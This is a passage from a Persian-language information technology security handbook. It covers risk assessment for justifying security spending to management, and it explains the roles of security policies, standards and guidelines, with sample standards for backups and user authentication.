ﺍﺭﺯﻳﺎﺑﻲ ﻣﺨﺎﻃﺮﻩ ﻭ ﺗﺤﻠﻴﻞ ﺳﻮﺩ ﻭ ﺯﻳﺎﻥ ﺭﺍ ﺩﺭﻙ ﻣﻲﻛﻨﻨـﺪ .ﺍﮔـﺮ
ﺑﺘﻮﺍﻧﻴﺪ ﻧﺸﺎﻥ ﺩﻫﻴﺪ ﻛﻪ ﺳﺎﺯﻣﺎﻥ ﺩﺭﺣﺎﻝ ﺣﺎﺿـﺮ ﺑـﺎ ﻣﺨـﺎﻃﺮﻩﺍﻱ
ﻣﻮﺍﺟﻪ ﺍﺳﺖ ﻛﻪ ﻣﻲﺗﻮﺍﻧﺪ ﺑﺎﻋﺚ ﻫﺰﻳﻨﻪﻫﺎﻱ ﺳﺎﻻﻧﺔ ﺯﻳﺎﺩﻱ ﺷـﻮﺩ
)ﺑﺮﺍﻱ ﺍﻳﻦ ﻣﻨﻈﻮﺭ ﻣﺠﻤﻮﻉ ﺧﺴﺎﺭﺗﻬﺎ ﻭ ﻫﺰﻳﻨﺔ ﺗﻌﻤﻴﺮﺍﺕ ﻫﻤﺔ ﺁﻧﭽﻪ ﻫﻢﺍﻛﻨـﻮﻥ
ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﺩﺍﺭﺩ ﺭﺍ ﻣﺤﺎﺳﺒﻪ ﻛﻨﻴـﺪ( ،ﺁﻧﮕـﺎﻩ ﻣﻤﻜـﻦ ﺍﺳـﺖ ﺍﻳـﻦ
ﺑﺮﺁﻭﺭﺩ ﻣﺪﻳﺮﻳﺖ ﺭﺍ ﻣﺘﻘﺎﻋـﺪ ﻛﻨـﺪ ﻛـﻪ ﺑـﺮﺍﻱ ﺍﺟﺘﻨـﺎﺏ ﺍﺯ ﻭﻗـﻮﻉ
ﻣﺨﺎﻃﺮﺍﺕ ،ﺭﻭﻱ ﻣﻨـﺎﺑﻊ ﻭ ﻛﺎﺭﻛﻨـﺎﻥ ﺳـﺮﻣﺎﻳﻪﮔـﺬﺍﺭﻱ ﺑﻴـﺸﺘﺮﻱ
ﻧﻤﺎﻳﻨﺪ.
ﺍﺯ ﻃﺮﻑ ﺩﻳﮕﺮ ﺍﮔﺮ ﺑﺎ ﺳـﺨﻨﺎﻥ ﻣﺒﻬﻤـﻲ ﻣﺜـﻞ "ﺍﺣﺘﻤـﺎﻝ ﺯﻳـﺎﺩﻱ
ﻭﺟــﻮﺩ ﺩﺍﺭﺩ ﻛــﻪ ﺑﻌــﺪ ﺍﺯ ﺍﻋﻼﻣﻴــﺔ ﺑﻌــﺪﻱ CERT/CCﺭﻭﻱ
ﺍﻳﻨﺘﺮﻧﺖ ﻧﻔﻮﺫﻫﺎﻱ ﻣﺘﻌﺪﺩﻱ ﺭﺥ ﺩﻫﺪ" ﺑﻪ ﻣﺪﻳﺮﻳﺖ ﻣﺮﺍﺟﻌﻪ ﻛﻨﻴـﺪ،
ﺑﺴﻴﺎﺭ ﺑﻌﻴﺪ ﺍﺳﺖ ﻛﻪ ﻧﺘﻴﺠﻪﺍﻱ ﺟﺰ ﻳـﻚ ﻧﮕﺮﺍﻧـﻲ ﺑـﺴﻴﺎﺭ ﻣﻼﻳـﻢ
)ﺁﻥ ﻫﻢ ﺗﻨﻬﺎ ﺩﺭ ﺑﻌﻀﻲ ﻣﻮﺍﺭﺩ( ﺑﻪ ﺑﺎﺭ ﺑﻴﺎﻳﺪ!
ﻧﻘﺶ ﺳﻴﺎﺳﺘﻬﺎﻱ ﺍﻣﻨﻴﺘﻲ
ﺳﻴﺎﺳﺖ ﺍﻣﻨﻴﺘﻲ ﺑﻪ ﺗﻌﺮﻳﻒ ﺳﺮﻣﺎﻳﻪﻫﺎﻱ ﺳﺎﺯﻣﺎﻥ ﻛﻤﻚ ﻣﻲﻛﻨـﺪ
ﻭ ﻧﻴﺰ ﮔﺎﻣﻬﺎﻳﻲ ﻛﻪ ﻻﺯﻡ ﺍﺳﺖ ﺑﺮﺍﻱ ﺣﻔﺎﻇﺖ ﺍﺯ ﺍﻳﻦ ﺳـﺮﻣﺎﻳﻪﻫـﺎ
ﺑﺮﺩﺍﺷﺘﻪ ﺷﻮﺩ ﺭﺍ ﻣﺸﺨﺺ ﻣﻲﻧﻤﺎﻳﺪ.
ﺳﻴﺎﺳﺘﻬﺎﻱ ﺍﻣﻨﻴﺘﻲ ﺭﺍ ﺑﻪ ﭼﻨﺪ ﺭﻭﺵ ﻣﺘﻔﺎﻭﺕ ﻣـﻲﺗـﻮﺍﻥ ﺗـﺪﻭﻳﻦ
ﻛﺮﺩ .ﻣﻲ ﺗﻮﺍﻧﻴﺪ ﻳﻚ ﺳﻴﺎﺳﺖ ﻛﻠﻲ ﺑﺴﻴﺎﺭ ﺳﺎﺩﺓ ﭼﻨـﺪ ﺻـﻔﺤﻪﺍﻱ
ﺑﻨﻮﻳﺴﻴﺪ ﻛﻪ ﺑﻴﺸﺘﺮ ﺍﺣﺘﻤﺎﻻﺕ ﺭﺍ ﺩﺭﻧﻈﺮ ﮔﺮﻓﺘﻪ ﺑﺎﺷـﺪ .ﻫﻤﭽﻨـﻴﻦ
ﻣﻲ ﺗﻮﺍﻧﻴﺪ ﺑﺮﺍﻱ ﻫﺮﻳـﻚ ﺍﺯ ﺩﺍﺭﺍﺋﻴﻬـﺎﻱ ﻣﺨﺘﻠـﻒ ﻳـﻚ ﺳﻴﺎﺳـﺖ
ﺑﺨﺶ ﺳﻮﻡ
ﺍﻳﻦ ﻓﺼﻞ ﺑﻄﻮﺭ ﻛﺎﻣﻞ ﺑـﻪ ﺗـﺸﺮﻳﺢ ﺳـﻄﻮﺡ ﻣﺨﺘﻠـﻒ ﺳﻴﺎﺳـﺖ
ﺍﻣﻨﻴﺘﻲ ﻣﻲﭘﺮﺩﺍﺯﺩ؛ ﻛـﻪ ﺩﺭ ﺁﻥ ﻫـﺮ ﻛﺎﺭﻣﻨـﺪ ﺳـﺎﺯﻣﺎﻥ ﺩﺭ ﺍﻣﻨﻴـﺖ
ﺭﺍﻳﺎﻧﻪﻫﺎ ،ﺷﺒﻜﻪﻫﺎ ﻭ ﺍﻃﻼﻋﺎﺕ ﻧﻘـﺸﻲ ﺑـﺮﺍﻱ ﺍﻳﻔـﺎ ﻛـﺮﺩﻥ ﺩﺍﺭﺩ.
ﻓﻬﺮﺳﺘﻬﺎﻱ ﻛﻨﺘﺮﻝ ﻣﺪﻳﺮﻳﺘﻲ ﻛﻪ ﺩﺭ ﺍﻳﻦ ﻗﺴﻤﺖ ﻣﻮﺭﺩ ﺍﺷﺎﺭﻩ ﻗﺮﺍﺭ
ﮔﺮﻓﺘﻪﺍﻧﺪ ﺭﺍ ﻣﻲﺗﻮﺍﻧﻴﺪ ﺩﺭ ﻓﺼﻮﻝ ﺍﻧﺘﻬﺎﻳﻲ ﻫﻤﻴﻦ ﺑﺨﺶ ﺍﺯ ﻛﺘـﺎﺏ
ﺑﻴﺎﺑﻴﺪ.
ﺩﺭ ﺣﺎﻟﺖ ﻋﺎﺩﻱ ﺑﺮﺍﻱ ﺍﻳﻨﻜﺎﺭ ﻳﻚ ﺳﻴﺎﺳﺖ ﺗﺪﻭﻳﻦ ﻣﻲﺷـﻮﺩ ﻛـﻪ
ﻻ ﺍﻧﺠـﺎﻡ ﺍﻳـﻦ ﻓﺮﺁﻳﻨـﺪ
ﺑﺎﻳﺪ ﺭﺳﻤﹰﺎ ﻣﻮﺭﺩ ﺗﺒﻌﻴﺖ ﻗﺮﺍﺭ ﮔﻴﺮﺩ .ﻣﻌﻤـﻮ ﹰ
ﻳﻚ ﭘﻴﻜﺎﺭ ﺩﺷﻮﺍﺭ ﺍﺳـﺖ .ﻫـﺪﻑ ﺍﺯ ﺍﻧﺠـﺎﻡ ﺍﺭﺯﻳـﺎﺑﻲ ﻣﺨـﺎﻃﺮﻩ ﻭ
ﺗﺤﻠﻴﻞ ﺳﻮﺩ ﻭ ﺯﻳـﺎﻥ ﺍﻭﻟﻮﻳـﺖﺑﻨـﺪﻱ ﺍﻗـﺪﺍﻣﺎﺕ ﻭ ﻧﺤـﻮﺓ ﺻـﺮﻑ
ﻫﺰﻳﻨﻪﻫﺎﻱ ﺍﻣﻨﻴﺘﻲ ﺷﻤﺎ ﺍﺳﺖ .ﺍﮔﺮ ﺑﺮﻧﺎﻣﺔ ﺗﺠﺎﺭﻱ ﺷـﻤﺎ ﻃـﻮﺭﻱ
ﺑﺎﺷﺪ ﻛﻪ ﻃﺒﻖ ﺁﻥ ﻧﺒﺎﻳﺪ ﺩﺭ ﻃﻮﻝ ﺳﺎﻝ ﻣﺨـﺎﻃﺮﺓ ﺑﻴﻤـﻪﻧـﺸﺪﻩﺍﻱ
ﺩﺍﺷﺘﻪ ﺑﺎﺷﻴﺪ ﻛﻪ ﻫﺰﻳﻨﺔ ﺁﻥ ﺍﺯ ﻳﻚ ﻣﻘﺪﺍﺭ ﻣﺸﺨﺺ ﺑﺎﻻﺗﺮ ﺑﺎﺷـﺪ،
ﻣﻲﺗﻮﺍﻧﻴﺪ ﺍﺯ ﺍﺭﺯﻳﺎﺑﻲ ﻣﺨﺎﻃﺮﻩ ﺍﺳـﺘﻔﺎﺩﻩ ﻛﻨﻴـﺪ ﺗـﺎ ﻣﺘﻮﺟـﻪ ﺷـﻮﻳﺪ
ﺑﺮﺍﻱ ﺭﺳﻴﺪﻥ ﺑﻪ ﺍﻳﻦ ﻫﺪﻑ ﺑﺎﻳﺪ ﭼـﻪ ﻫﺰﻳﻨـﻪﻫـﺎﻳﻲ ﺭﺍ ﻣﺘﺤﻤـﻞ
ﺷﻮﻳﺪ .ﺍﻳﻦ ﺍﺭﺯﻳﺎﺑﻲ ﻫﻤﭽﻨﻴﻦ ﻣﻲﺗﻮﺍﻧﺪ ﺷﻤﺎ ﺭﺍ ﺭﺍﻫﻨﻤﺎﻳﻲ ﻛﻨﺪ ﻛﻪ
ﻛﺪﺍﻡ ﮔﺎﻡ ﺭﺍ ﺍﻭﻝ ﻭ ﻛﺪﺍﻡ ﮔﺎﻡ ﺭﺍ ﺩﻭﻡ ﺑﺮﺩﺍﺭﻳﺪ ،ﻭ ﭼﻪ ﻛﺎﺭﻫـﺎﻳﻲ ﺭﺍ
ﺑﻪ ﺳﺎﻟﻬﺎﻱ ﺑﻌﺪ ﻣﻮﻛﻮﻝ ﻛﻨﻴﺪ .ﻳﻚ ﻓﺎﻳﺪﺓ ﺩﻳﮕﺮ ﺍﺭﺯﻳﺎﺑﻲ ﻣﺨﺎﻃﺮﻩ
ﺍﻳﻦ ﺍﺳﺖ ﻛﻪ ﻣﺪﻳﺮﻳﺖ ﺷﺮﻛﺖ ﻣﺘﻘﺎﻋﺪ ﻣﻲﺷﻮﺩ ﻛﻪ ﺷـﻤﺎ ﺑـﺮﺍﻱ
ﺑﺮﻗﺮﺍﺭﻱ ﺍﻣﻨﻴﺖ ﻧﻴﺎﺯ ﺑﻪ ﻣﻨﺎﺑﻊ ﺑﻴﺸﺘﺮﻱ ﺩﺍﺭﻳﺪ.
١٥٠
ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ
ﺧﺎﺹ ﺗﺪﻭﻳﻦ ﻛﻨﻴﺪ؛ ﻣﺜﻞ ﺳﻴﺎﺳﺖ ﭘـﺴﺖﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ ،ﺳﻴﺎﺳـﺖ
ﺩﺍﺩﻩ ﻫﺎﻱ ﻛﺎﺭﻛﻨﺎﻥ ﻭ ﺳﻴﺎﺳـﺖ ﺍﻃﻼﻋـﺎﺕ ﺣـﺴﺎﺑﻬﺎﻱ ﻛـﺎﺭﺑﺮﻱ.
ﺳﻮﻣﻴﻦ ﺭﻭﻳﻜﺮﺩﻱ ﻛﻪ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺷﺮﻛﺘﻬﺎ ﺍﺯ ﺁﻥ ﺑﻬﺮﻩ ﺟﺴﺘﻪﺍﻧـﺪ
ﻭ ﺑﺮﺍﻱ ﺗﻤﺎﻣﻲ ﺷﺮﻛﺘﻬﺎ ﺑﺎ ﺍﻧﺪﺍﺯﻩﻫﺎﻱ ﻣﺨﺘﻠﻒ ﻗﺎﺑﻞ ﺍﺟـﺮﺍ ﺍﺳـﺖ
ﺩﺍﺷﺘﻦ ﺳﻴﺎﺳﺘﻬﺎ ،ﺍﺳﺘﺎﻧﺪﺍﺭﺩﻫﺎ ﻭ ﺧﻂﻣﺸﻲﻫﺎﻱ ﺳﺎﺩﻩ ﻭ ﻣﺨﺘـﺼﺮ
ﺍﺳﺖ ﻛﻪ ﺑﺎ ﺍﻟﮕﻮﻫﺎﻱ ﺳﺮﺁﻣﺪﻱ ﺑﻬﺒﻮﺩ ﻳﺎﻓﺘﻪﺍﻧﺪ .ﺩﺭ ﺍﺩﺍﻣﻪ ،ﺭﻭﻳﻜﺮﺩ
ﺁﺧﺮ ﺭﺍ ﺑﻄﻮﺭ ﺧﻼﺻﻪ ﺗﺸﺮﻳﺢ ﺧﻮﺍﻫﻴﻢ ﻛـﺮﺩ ﻭ ﻣﻨـﺎﺑﻊ ﺑﻴـﺸﺘﺮ ﺩﺭ
ﺍﻳﻦ ﺭﺍﺑﻄﻪ ﻧﻴﺰ ﺩﺭ ﺑﺨﺶ ﻣﺮﺍﺟﻊ ﻣﻌﺮﻓﻲ ﺷﺪﻩﺍﻧﺪ.
ﺳﻴﺎﺳﺖ ﺳﻪ ﻧﻘﺶ ﻋﻤﺪﻩ ﺍﻳﻔﺎ ﻣﻲﻛﻨﺪ .ﺍﻭﻝ ﻣﺸﺨﺺ ﻣﻲﻛﻨـﺪ ﺍﺯ
ﭼﻪ ﭼﻴﺰﻱ ﺣﻔﺎﻇﺖ ﻣﻲﺷﻮﺩ ﻭ ﭼﺮﺍ؛ ﺩﻭﻡ ﺍﻳﻨﻜﻪ ﻣﺴﺌﻮﻟﻴﺖ ﻣﺮﺑﻮﻁ
ﺑﻪ ﺗﺄﻣﻴﻦ ﺍﻳﻦ ﺣﻔﺎﻇﺖ ﺭﺍ ﻣـﺸﺨﺺ ﻣـﻲﻧﻤﺎﻳـﺪ؛ ﻭ ﺳـﻮﻡ ﺍﻳﻨﻜـﻪ
ﺯﻣﻴﻨﻪﺍﻱ ﺑﺮﺍﻱ ﺗﻔﺴﻴﺮ ﻭ ﺣﻞ ﺩﺭﮔﻴﺮﻳﻬﺎﻳﻲ ﻛﻪ ﻣﻤﻜـﻦ ﺍﺳـﺖ ﺩﺭ
ﺁﻳﻨﺪﻩ ﺑﻮﺟﻮﺩ ﺑﻴﺎﻳﺪ ﺍﺭﺍﺋﻪ ﻣﻲ ﺩﻫﺪ .ﺁﻧﭽـﻪ ﻛـﻪ ﺩﺭ ﺳﻴﺎﺳـﺖ ﻧﺒﺎﻳـﺪ
ﺑﻴﺎﻳﺪ ﻋﺒﺎﺭﺕ ﺍﺳﺖ ﺍﺯ ﻓﻬﺮﺳﺖ ﺗﻬﺪﻳﺪﻫﺎ ،ﻣﺎﺷﻴﻦﺁﻻﺕ ﻭ ﺍﻓﺮﺍﺩ )ﺑـﺎ
ﻧﺎﻣﻬﺎﻳﺸﺎﻥ( .ﺳﻴﺎﺳﺖ ﺑﺎﻳﺪ ﻛﻠﻲ ﺑﺎﺷـﺪ ﻭ ﺩﺭ ﻃـﻮﻝ ﺯﻣـﺎﻥ ﺑﻨـﺪﺭﺕ
ﺩﭼﺎﺭ ﺗﻐﻴﻴﺮ ﺷﻮﺩ.
ﺍﺳﺘﺎﻧﺪﺍﺭﺩﻫﺎ
ﺍﺯ ﺍﺳﺘﺎﻧﺪﺍﺭﺩﻫﺎ ﺑﺮﺍﻱ ﻣﻌﺮﻓﻲ ﺭﺍﻫﻜﺎﺭﻫﺎﻱ ﻣﻮﻓﻘﻴﺖﺁﻣﻴﺰ ﺍﻣﻨﻴـﺖ ﺩﺭ
ﻻ ﺍﺯ
ﻳﻚ ﺳﺎﺯﻣﺎﻥ ﺍﺳﺘﻔﺎﺩﻩ ﻣـﻲﺷـﻮﺩ ﻭ ﺩﺭ ﻋﺒﺎﺭﺗﻬـﺎﻱ ﺁﻥ ﻣﻌﻤـﻮ ﹰ
ﻓﻌﻞ "ﺑﺎﻳﺪ" ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﮔـﺮﺩﺩ .ﺍﺳـﺘﺎﻧﺪﺍﺭﺩﻫﺎ ﻋﻤﻮﻣـﹰﺎ ﻣـﺴﺘﻘﻞ ﺍﺯ
ﺑﺴﺘﺮﻫﺎﻱ ﻣﺨﺘﻠﻒ ﻓﻨﻲ ﺗﻬﻴﻪ ﻣـﻲﺷـﻮﻧﺪ ﻭ ﺣـﺪﺍﻗﻞ ﻳـﻚ ﻣﻌﻴـﺎﺭ
ﺑﺮﺍﻱ ﺗﻌﻴﻴﻦ ﺍﻳﻨﻜﻪ ﺁﻳﺎ ﺭﻋﺎﻳﺖ ﺷﺪﻩﺍﻧﺪ ﻳﺎ ﻧﻪ ﺭﺍ ﻣﻌﺮﻓﻲ ﻣﻲﻧﻤﺎﻳﻨﺪ.
ﺍﺳﺘﺎﻧﺪﺍﺭﺩﻫﺎ ﺑﺮﺍﻱ ﭘﺸﺘﻴﺒﺎﻧﻲ ﺍﺯ ﺳﻴﺎﺳﺖ ﭘﺪﻳﺪ ﺁﻣﺪﻩﺍﻧﺪ ﻭ ﺩﺭ ﻃـﻮﻝ
ﺯﻣﺎﻥ ﺑﻪ ﺁﻫﺴﺘﮕﻲ ﺗﻐﻴﻴﺮ ﻣﻲ ﻛﻨﻨـﺪ .ﺍﺳـﺘﺎﻧﺪﺍﺭﺩﻫﺎ ﻣﻤﻜـﻦ ﺍﺳـﺖ
ﺩﺭﺑﺮﮔﻴﺮﻧﺪﺓ ﻣﻄﺎﻟﺒﻲ ﺑﺎﺷﻨﺪ ﻣﺎﻧﻨﺪ ﺍﻳﻨﻜﻪ ﺍﺳﺘﺨﺪﺍﻣﻬﺎﻱ ﺟﺪﻳﺪ ﺑﺎﻳـﺪ
ﭼﮕﻮﻧﻪ ﺍﻧﺠﺎﻡ ﺷـﻮﻧﺪ ،ﺍﺯ ﻧـﺴﺨﺔ ﭘـﺸﺘﻴﺒﺎﻥ ﺑﺎﻳـﺪ ﺗـﺎ ﭼـﻪ ﻣـﺪﺗﻲ
ﻧﮕﻬﺪﺍﺭﻱ ﺑﻌﻤﻞ ﺁﻳﺪ ،ﻭ ﺍﻳﻨﻜﻪ ﺳﻴﺴﺘﻤﻬﺎﻱ UPSﭼﮕﻮﻧﻪ ﻣـﻮﺭﺩ
ﺁﺯﻣﺎﻳﺶ ﻗﺮﺍﺭ ﻣﻲﮔﻴﺮﻧﺪ.
ﺑﻌﻨﻮﺍﻥ ﻣﺜﺎﻝ ﻳﻚ ﺍﺳﺘﺎﻧﺪﺍﺭﺩ ﺩﺭ ﻣـﻮﺭﺩ ﻧـﺴﺨﻪﻫـﺎﻱ ﭘـﺸﺘﻴﺒﺎﻥ ﺭﺍ
ﺩﺭﻧﻈﺮ ﺑﮕﻴﺮﻳﺪ .ﻣﻤﻜﻦ ﺍﺳﺖ ﺩﺭ ﺁﻥ ﺍﻳﻨﮕﻮﻧﻪ ﺁﻣﺪﻩ ﺑﺎﺷﺪ:
ﭘﺸﺘﻴﺒﺎﻧﻬﺎ ﺑﺎﻳﺪ ﺍﺯ ﺗﻤﺎﻡ ﺩﺍﺩﻩﻫﺎﻱ ﺍﻳﻨﺘﺮﻧﺘﻲ ﻭ ﻧﺮﻡﺍﻓﺰﺍﺭﻱ ﻭ ﺑﺮ
ﺍﺳﺎﺱ ﻳﻚ ﺑﺮﻧﺎﻣـﺔ ﻣـﻨﻈﻢ ﺯﻣـﺎﻧﻲ ﺗﻬﻴـﻪ ﺷـﻮﻧﺪ .ﺩﺭ ﻫـﻴﭻ
ﺻﻮﺭﺗﻲ ﻋﻤﻠﻴﺎﺕ ﻋﺎﺩﻱ ﭘﺸﺘﻴﺒﺎﻥﮔﻴﺮﻱ ﻧﺒﺎﻳﺪ ﻛﻤﺘﺮ ﺍﺯ ﻳﻜﺒﺎﺭ
ﺩﺭ ﻫﺮ ﻫﻔﺘﺎﺩ ﻭ ﺩﻭ ﺳﺎﻋﺖ ﺍﻧﺠﺎﻡ ﺷﻮﺩ .ﻫﻤﺔ ﭘﺸﺘﻴﺒﺎﻧﻬﺎ ﺑﺎﻳـﺪ
ﺣﺪﺍﻗﻞ ﺑﺮﺍﻱ ﻳﻚ ﺩﻭﺭﺓ ﺷﺶ ﻣﺎﻫﻪ ﺣﻔﻆ ﺷﻮﻧﺪ؛ ﻭ ﺍﺯ ﺍﻭﻟﻴﻦ
ﭘﺸﺘﻴﺒﺎﻥ ﻣﺎﻫﻬﺎﻱ ﮊﺍﻧﻮﻳﻪ ﻭ ﮊﻭﺋﻦ ﻫﺮ ﺳـﺎﻝ ﺩﺭ ﻳـﻚ ﻣﺤـﻞ
ﺍﻣﻦ ﺩﺭ ﺧﺎﺭﺝ ﺍﺯ ﺳﺎﺯﻣﺎﻥ ﺑﺮﺍﻱ ﻫﻤﻴﺸﻪ ﻣﺮﺍﻗﺒـﺖ ﺑـﻪ ﻋﻤـﻞ
ﻣﻲﺁﻳﺪ .ﺣﺪﺍﻗﻞ ﻳﻚ ﻫﻔﺘـﻪ ﺩﺭ ﻣﻴـﺎﻥ ﺑﺎﻳـﺪ ﻳـﻚ ﭘـﺸﺘﻴﺒﺎﻥ
ﻛﺎﻣــﻞ ﺍﺯ ﻛــﻞ ﺳﻴــﺴﺘﻢ ﺗﻬﻴــﻪ ﺷــﻮﺩ .ﻫﻤــﺔ ﺭﺳــﺎﻧﻪﻫــﺎﻱ
ﭘﺸﺘﻴﺒﺎﻥﮔﻴـﺮﻱ ﺑﺎﻳـﺪ ﺩﺭ ﻧـﻮﻉ ﺧـﻮﺩ ﻭﺍﺟـﺪ ﺍﺳـﺘﺎﻧﺪﺍﺭﺩﻫﺎﻱ
ﭘﺬﻳﺮﻓﺘﻪﺷﺪﺓ ﺻﻨﻌﺘﻲ ﺑﺎﺷﻨﺪ ﺗـﺎ ﺣـﺪﺍﻗﻞ ﺑﻌـﺪ ﺍﺯ ﭘـﻨﺞ ﺳـﺎﻝ
ﺑﺎﻗﻲﻣﺎﻧﺪﻥ ﺩﺭ ﻳﻚ ﺍﻧﺒﺎ ﹺﺭ ﺑﺪﻭﻥ ﻣﺮﺍﻗﺐ ،ﺍﻃﻼﻋﺎﺕ ﺭﻭﻱ ﺁﻧﻬﺎ
ﺑﺎﺯ ﻫﻢ ﻗﺎﺑﻞ ﺑﺎﺯﻳﺎﺑﻲ ﺑﺎﺷﺪ.
ﺍﻳﻦ ﺍﺳـﺘﺎﻧﺪﺍﺭﺩ ﻧـﺎﻡ ﻫـﻴﭻ ﻣﻜـﺎﻧﻴﺰﻡ ﭘـﺸﺘﻴﺒﺎﻥﮔﻴـﺮﻱ ﻳـﺎ ﺑـﺴﺘﺔ
ﻧﺮﻡ ﺍﻓﺰﺍﺭﻱ ﺧﺎﺹ ﺭﺍ ﺫﻛﺮ ﻧﻤﻲﻛﻨﺪ؛ ﻫﺮﭼﻨﺪ ﺁﻥ ﭼﻴﺰﻱ ﻛـﻪ ﺑﺎﻳـﺪ
ﺫﺧﻴﺮﻩ ﺷﻮﺩ ﻭ ﺍﻳﻨﻜﻪ ﺑﺮﺍﻱ ﭼﻪ ﻣﺪﺕ ﺑﺎﻳﺪ ﺫﺧﻴـﺮﻩ ﮔـﺮﺩﺩ ﻭ ﭼﻨـﺪ
ﻭﻗﺖ ﻳﻜﺒﺎﺭ ﺑﺎﻳﺪ ﺍﻳﻨﻜﺎﺭ ﺍﻧﺠﺎﻡ ﮔﻴﺮﺩ ﺭﺍ ﺑﻮﺿﻮﺡ ﻋﻨﻮﺍﻥ ﻣﻲﻧﻤﺎﻳﺪ.
ﻳﻚ ﺍﺳﺘﺎﻧﺪﺍﺭﺩ ﻣﻌﻘﻮﻝ ﺑﺮﺍﻱ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﺭﺍ ﺩﺭﻧﻈﺮ ﺑﮕﻴﺮﻳﺪ:
ﺩﺭ ﻳﻚ ﺭﺍﻳﺎﻧﺔ ﭼﻨﺪﻛﺎﺭﺑﺮﻩ ﻫﺮ ﺣﺴﺎﺏ ﻛﺎﺭﺑﺮﻱ ﺑﺎﻳﺪ ﺗﻨﻬﺎ ﻳﻚ
ﻛﺎﺭﺑﺮ ﻣﺠﺎﺯ ﺑﺮﺍﻱ ﺍﺳـﺘﻔﺎﺩﻩ ﺩﺍﺷـﺘﻪ ﺑﺎﺷـﺪ .ﺁﻥ ﻛـﺎﺭﺑﺮ ﺑﺎﻳـﺪ
ﻫﻮﻳﺖ ﺧﻮﺩ ﺭﺍ ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻳﻚ ﻧـﺸﺎﻧﺔ ﺗﺄﻳﻴﺪﻛﻨﻨـﺪﻩ ﺑـﺮﺍﻱ
ﺳﻴﺴﺘﻢ ﺍﺛﺒﺎﺕ ﻧﻤﺎﻳﺪ .ﺍﺛﺒﺎﺕ ﻫﻮﻳﺖ ﺑﺮﺍﻱ ﺭﺍﻳﺎﻧﻪ ﺭﺍ ﻣﻲ ﺗـﻮﺍﻥ
ﺑﻮﺳــﻴﻠﺔ ﻳــﻚ ﻧــﺸﺎﻥ ﺗــﺼﺪﻳﻖ ﻫﻮﻳــﺖ ،٧٨ﻳــﻚ ﻛــﺎﺭﺕ
ﻫﻮﺷﻤﻨﺪ ،٧٩ﻳﻚ ﺭﻣﺰ ﻋﺒﻮﺭ ﻳﻜﺒﺎﺭ ﻣـﺼﺮﻑ ،ﻳـﺎ ﻳـﻚ ﻣﻌﻴـﺎﺭ
ﻲ ٨٠ﺗﺄﻳﻴﺪﺷﺪﻩ ﺻﻮﺭﺕ ﺩﺍﺩ .ﺩﺭ ﻫﻴﭻ ﺩﺳﺘﮕﺎﻩ ﺭﺍﻳﺎﻧـﻪﺍﻱ
ﺯﻳﺴﺘ ﹺ
ﻛﻪ ﺗﺎﻛﻨﻮﻥ ﺑﻪ ﺷﺒﻜﻪ ﻭﺻﻞ ﺷﺪﻩ ،ﻗﺎﺑﻞ ﺣﻤﻞ ﺑـﻪ ﺧـﺎﺭﺝ ﺍﺯ
ﺷﺮﻛﺖ ﺑﻮﺩﻩ ،ﻳﺎ ﺑﻴﺮﻭﻥ ﺍﺯ ﺩﻓﺘـﺮ ﺧـﺼﻮﺻﻲ ﻣـﻮﺭﺩ ﺍﺳـﺘﻔﺎﺩﻩ
ﻗﺮﺍﺭﮔﺮﻓﺘﻪ ،ﻧﺒﺎﻳـﺪ ﺍﺯ ﺭﻣﺰﻫـﺎﻱ ﻋﺒـﻮﺭ ﺗﻜﺮﺍﺭﺷـﺪﻧﻲ ﺑﻌﻨـﻮﺍﻥ
ﻣﻜﺎﻧﻴﺰﻡ ﺍﺻﻠﻲ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﺍﺳﺘﻔﺎﺩﻩ ﻛﺮﺩ.
ﺭﺍﻫﺒﺮﺩﻫﺎ
ﻻ ﺩﺭ ﺁﻧﻬـﺎ ﻓﻌـﻞ
ﺭﺍﻫﺒﺮﺩﻫﺎ )ﺧﻂﻣﺸﻲﻫﺎ( ﺍﺳﻨﺎﺩﻱ ﻫﺴﺘﻨﺪ ﻛﻪ ﻣﻌﻤﻮ ﹰ
"ﺑﻬﺘﺮ ﺍﺳﺖ" ﺑﻜﺎﺭ ﻣﻲﺭﻭﺩ .ﻫﺪﻑ ﺭﺍﻫﺒﺮﺩﻫـﺎ ﺗﻔـﺴﻴﺮ ﺍﺳـﺘﺎﻧﺪﺍﺭﺩﻫﺎ
ﺑﺮﺍﻱ ﻳﻚ ﻣﺤﻴﻂ ﺧﺎﺹ -ﻳﻚ ﻣﺤﻴﻂ ﻧﺮﻡﺍﻓﺰﺍﺭﻱ ﻳﺎ ﻳﻚ ﻣﺤﻴﻂ
ﻓﻴﺰﻳﻜﻲ -ﻣﻲﺑﺎﺷﺪ .ﺑﺮﺧﻼﻑ ﺍﺳﺘﺎﻧﺪﺍﺭﺩﻫﺎ ،ﺭﺍﻫﺒﺮﺩﻫﺎ ﺩﺭﺻـﻮﺭﺕ
ﻧﻴﺎﺯ ﺗﻐﻴﻴﺮ ﻣﻲﻛﻨﻨﺪ .ﺍﻳﻦ ﺍﺟﺰﺍﻱ ﺳﻴﺎﺳﺖ ،ﻫﻤﺎﻧﻄﻮﺭ ﻛﻪ ﺍﺯ ﻧﺎﻣﺸﺎﻥ
ﻻ ﻣﺜﻞ ﺍﺳﺘﺎﻧﺪﺍﺭﺩﻫﺎﻱ ﻛﺎﺭﺍﻳﻲ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻗـﺮﺍﺭ
ﭘﻴﺪﺍﺳﺖ ،ﻣﻌﻤﻮ ﹰ
ﻧﻤﻲﮔﻴﺮﻧﺪ ،ﺑﻠﻜﻪ ﺑﺼﻮﺭﺕ ﺭﺍﻫﻬﺎﻳﻲ ﻛـﻪ ﺑـﻪ ﺍﻧﺠـﺎﻡ ﻛـﺎﺭ ﻛﻤـﻚ
ﻣﻲﻛﻨﻨﺪ ﺑﻜﺎﺭ ﻣﻲﺭﻭﻧﺪ.
